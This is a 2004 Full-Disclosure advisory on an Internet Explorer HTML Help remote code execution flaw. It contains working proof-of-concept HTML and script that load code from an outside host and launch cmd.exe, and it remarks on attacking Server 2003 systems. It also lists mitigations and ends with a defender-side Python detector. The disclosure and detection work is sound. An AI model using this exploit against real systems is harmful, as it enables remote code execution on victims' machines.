
[Full-Disclosure] Windows (XP SP2) Remote code execution with parameters

Subject: [Full-Disclosure] Windows (XP SP2) Remote code execution with parameters
Date: Tue, 28 Dec 2004 00:24:02 +0000
PoC (called CMDExe): http://www.freewebs.com/shreddersub7/htm.htm
Discussion: http://www.freewebs.com/shreddersub7/expl-discuss.htm

------------------Which systems are vulnerable?--------
Any system running any Microsoft Windows XP edition with Internet Explorer 6 or higher, even with SP2 applied.
Any system running any Microsoft Windows Server 2003 edition with Internet Explorer 6 or higher.


------------------How does this exploit work?-----------
The problem with Internet Explorer is that it doesn't set any restrictions on web pages that request opening a Windows Help file, compiled with HTML Help. Without a restriction, we can (in Internet Explorer) easily command to open any local web page stored on a victim's computer, including web pages that are found in Windows Help files (with extension .CHM). In this PoC (Proof of Concept, see below for viewing the PoC), the web page "alt_url_enterprise_specific.htm" (that is found in the Windows Help file "ntshared.chm") will be opened in the HTML Help program "hh.exe".
Since we now opened a web page stored in a Windows Help file (.CHM), it is possible (thanks to the exploit) to execute an HTML Help control (in this case, an ActiveX control) that only fully works in Help files. So in this PoC, we chose to launch an ActiveX control for HTML Help. Then, this ActiveX control will execute any program we want, in this example that's "cmd.exe".


Thanks to the exploit, it is even possible to add parameters to the executed program (here: cmd.exe), so that you can easily start malware out of "cmd.exe". In this PoC, we added the parameter "/c pause" to the execution code "cmd.exe", and the result is a DOS Prompt with the text "Press any key to continue. . .".

To make it complete, the 2 needed programs (Internet Explorer and HTML Help) will be automatically shut down after the execution is finished. In this PoC, HTML Help and Internet Explorer will be automatically closed after the execution, without user interaction.

------------------How can you reproduce this PoC?------------------
Create the file "htm.htm" with the following code (please notice that you may want to modify the full path to the file "htm.txt"):
--------------
<html><head><title>CMDExe - Windows Exploit - Remote code execution with parameters - Proof of Concept</title></head><body>
<br><OBJECT style="display:none" id="locate" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm">
</OBJECT>
<OBJECT style="display:none" id="locator" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"javascript\\\" src=\\\"http://www.freewebs.com/shreddersub7/htm.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>
<script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout("window.opener=null;window.close()",10000)</script></body></html>
--------------


Then create the file "htm.txt" (please notice that you may have to change the full path to your specified program, in this case "cmd.exe"):
--------------
document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/c pause,'></object><object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=close></object><script>a.Click\(\);b.Click\(\)</script>");
--------------


If you want to attack Windows Server 2003 systems, you also need to upload the "hhctrl.ocx" file (http://www.freewebs.com/shreddersub7/hhctrl.ocx)

--------------How to avoid this exploit...-------------
Since there are no patches from Microsoft available yet, here are some (temporary?) solutions: Disable Internet Explorer
or disable Active Scripting (HOW?).
OR use another browser, for example Mozilla Firefox.


More info (like credits, things that are included etc.) about this exploit can be found at http://www.freewebs.com/shreddersub7/expl-discuss.htm

Contact: ShredderSub7_at_hotmail.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
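
A defender-side check for the pattern in the PoC above, as an added example that is not part of the original post: it parses HTML (or a script body that writes HTML) and flags `<object>` elements that instantiate the HTML Help control by the CLSID quoted in the post, along with the two parameter shapes the post relies on. The class name, the `scan` function, the finding strings and the sample inputs are assumptions made for illustration; the samples are constructed and use placeholder file names.

```python
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (hhctrl.ocx), taken from the PoC above.
HHCTRL_CLSID = "clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"

class HHCtrlScanner(HTMLParser):
    """Flags <object> elements that instantiate the HTML Help control."""

    def __init__(self):
        super().__init__()
        self.findings = []    # (object id, reason) tuples
        self._obj = None      # id of the hhctrl <object> being parsed

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        if tag == "object":
            is_hh = a.get("classid", "").lower() == HHCTRL_CLSID
            self._obj = a.get("id", "?") if is_hh else None
            if is_hh:
                self.findings.append((self._obj, "instantiates hhctrl"))
        elif tag == "param" and self._obj is not None:
            name, value = a.get("name", "").lower(), a.get("value", "").lower()
            if name == "command" and value.startswith("shortcut"):
                self.findings.append((self._obj, "shortcut command"))
            elif name.startswith("item") and value.startswith(
                    ("command;ms-its:", "command;javascript:")):
                self.findings.append((self._obj, "item opens local/script URL"))

    def handle_endtag(self, tag):
        if tag == "object":
            self._obj = None

def scan(markup):
    """Return the findings for one HTML page or script body."""
    scanner = HHCtrlScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings

# Constructed samples (not captured traffic); file names are placeholders.
PAGE = ('<object id="locate" classid="CLSID:ADB880A6-D8FF-11CF-9377-00AA003B7A11">'
        '<param name="Command" value="Related Topics, MENU">'
        '<param name="Item1" value="command;ms-its:c:/windows/help/example.chm::/topic.htm">'
        '</object>')
SCRIPT = ('document.write("<object id=a classid=' + HHCTRL_CLSID + '>'
          "<param name=command value=shortcut>"
          "<param name=item1 value=',example.exe,/c pause,'></object>\");")
BENIGN = ('<object id="x" classid="clsid:00000000-0000-0000-0000-000000000000">'
          '<param name="command" value="shortcut"></object>')
```

`scan(PAGE)` and `scan(SCRIPT)` each return two findings, while `scan(BENIGN)` returns none because the parameters are only flagged inside an object carrying the HTML Help CLSID.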
